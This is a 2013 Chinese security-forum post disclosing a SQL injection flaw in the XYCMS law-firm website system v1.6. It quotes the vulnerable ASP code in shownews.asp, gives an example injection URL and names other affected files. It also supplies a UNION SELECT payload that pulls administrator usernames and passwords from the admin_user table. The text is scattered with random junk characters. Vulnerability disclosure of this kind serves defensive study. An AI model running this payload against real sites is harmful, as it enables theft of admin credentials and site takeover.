找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2042|回复: 0
打印 上一主题 下一主题

XYCMS律师事务所建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
- ?) X* v, \. V+ \! J1 h / V4 P$ l* i7 ?/ ~) I6 X
淫荡分割线
* z6 F" E  W  G--------------------------------------------------------
' G* v% K, z! r" N$ l ( z# t& Z7 U; S* A3 m
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)- f" U4 D' m6 X. I9 p6 ]
源码地址:http://down.chinaz.com/soft/29233.htm2 _' c( J5 _3 S5 G" D- y3 I

( f1 Z7 v( D0 p  f; ]漏洞文件:shownews.asp
8 C/ B2 S* j; R$ A- M: X漏洞代码:7-13行
; k- i0 y8 D$ j/ a0 z4 Z4 |3 B 8 [+ t' H4 y. }: {- x" o4 g: F+ y
( [5 D; k8 F2 `- [6 g2 ^
<%
2 b# F9 [. D, k4 \3 o* E" M: tid=request.QueryString("id")+ T- \0 c6 U, v  q
    ; R* T+ [8 t7 x* ]) T3 F+ l
set snews=server.createobject("adodb.recordset")   A0 [7 z$ D2 Q9 D( D; K: R. x0 v. [
exec="select * from [news] where id="&id
( h0 _$ j. h2 B- `2 l- o9 X* e6 asnews.open exec,conn,1,17 M: `0 @% F& Q6 t# i; {. N' L, k
%>( n  E( [* ?" M/ X, b8 b! T' D, k
0 i- ~# m+ W  Q' K

+ e4 d2 `3 I: j! ?什么过滤都没有  直造成注入
3 }. r2 F4 d0 X' z0 Y
+ D8 c9 N  o" \8 L4 M注入点:http://127.0.0.1:99/shownews.asp?id=xx
& g. _- B0 Z5 v/ A; C
' S+ H" u' G, }) k4 @其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找' v3 o2 e6 R# e) j' B

% F# {9 N( g/ X9 D ' a  a7 z& Q; D/ O/ L
exp: union select 1,admin,password,4,5,7 from admin_user
2 d" l  u2 h; E1 y" d- D: s
2 x7 t& ~# t8 r7 b- a; w6 d5 m1 z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表